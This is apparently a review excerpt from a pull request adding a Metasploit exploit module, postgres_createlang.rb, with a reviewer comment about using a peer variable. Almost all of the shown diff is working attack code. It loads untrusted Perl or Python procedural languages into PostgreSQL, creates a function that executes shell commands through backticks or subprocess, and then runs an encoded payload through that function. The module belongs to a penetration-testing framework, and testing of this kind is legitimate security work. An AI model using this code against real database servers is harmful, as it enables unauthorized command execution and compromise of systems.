modules/exploits/multi/postgres/postgres_createlang.rb

```diff
@@ -0,0 +1,258 @@
+
+    else
+      print_error "#{rhost}:#{rport} - Unsupported version - #{version}"
+      return false
+    end
+
+    print_warning 'This exploit does not clean up after itself - you will need to do that manually'
+
+    # Attack!
+    begin
+      func_name = Rex::Text.rand_text_alpha(10)
+
+      languages = %w(perl python python2 python3)
+      loaded = false
+
+      languages.each do |language|
+        load_lang = create_language(language, extension)
+        human_language = language.capitalize
+
+        print_status "#{rhost}:#{rport} - Attempting to load #{human_language}"
+
+        case load_lang
+          when :exists
+            print_good "#{rhost}:#{rport} - #{human_language} is already loaded, continuing"
+            create_function(language, func_name)
+            loaded = true
+
+          when :loaded
+            print_good "#{rhost}:#{rport} - #{human_language} was successfully loaded, continuing"
+            create_function(language, func_name)
+            loaded = true
+
+          when :not_exists
+            print_status "#{rhost}:#{rport} - #{human_language} could not be loaded"
+
+          else
+            print_error "#{rhost}:#{rport} - Error occurred"
+            return false
+        end
+
+        break if loaded
+      end
+
+      if loaded
+        # Known bug: When using the cmd/unix/python*, ruby*, or bash payloads, it'll say
+        # "NoMethodError undefined method `+' for nil:NilClass"
+        # But the exploit and payload work just fine. I'm open to suggestions on why and how to fix - @micheal
+        select_query = postgres_query("SELECT exec_#{func_name}('#{payload.encoded.gsub("'", "''")}')")
+
+        case select_query.keys[0]
+          when :conn_error
+            print_error "#{rhost}:#{rport} - Connection error"
+
+          when :sql_error
+            print_error "#{rhost}:#{rport} - Exploit failed"
+            return false
+
+          when :complete
+            print_good "#{rhost}:#{rport} - Exploit successful"
+        end
+
+      else
+        print_error "#{rhost}:#{rport} - Exploit failed"
+        return false
+      end
+
+    rescue RuntimeError => e
+      print_error "#{rhost}:#{rport} - Failed to create UDF: #{e.class}: #{e}"
+    end
+
+    postgres_logout if @postgres_conn
+  end
+
+  def create_function(language, func_name)
+    load_func = ''
+
+    case language
+      when 'perl'
+        load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(text) RETURNS void as $$" \
+        "`$_[0]`;" \
+        "$$ LANGUAGE pl#{language}u")
+
+      when /^python(?:2|3)?/i
+        load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" \
+        "import subprocess, shlex\r" \
+        "subprocess.check_output(shlex.split(c))\r" \
+        "$$ LANGUAGE pl#{language}u")
+    end
+
+    case load_func.keys[0]
+      when :conn_error
+        print_error "#{rhost}:#{rport} - Connection error"
```

Comment:
Here and everywhere else you are using `#{rhost}:#{rport}`, try to use just `#{peer}`, assuming your branch is mostly up to date with `master`.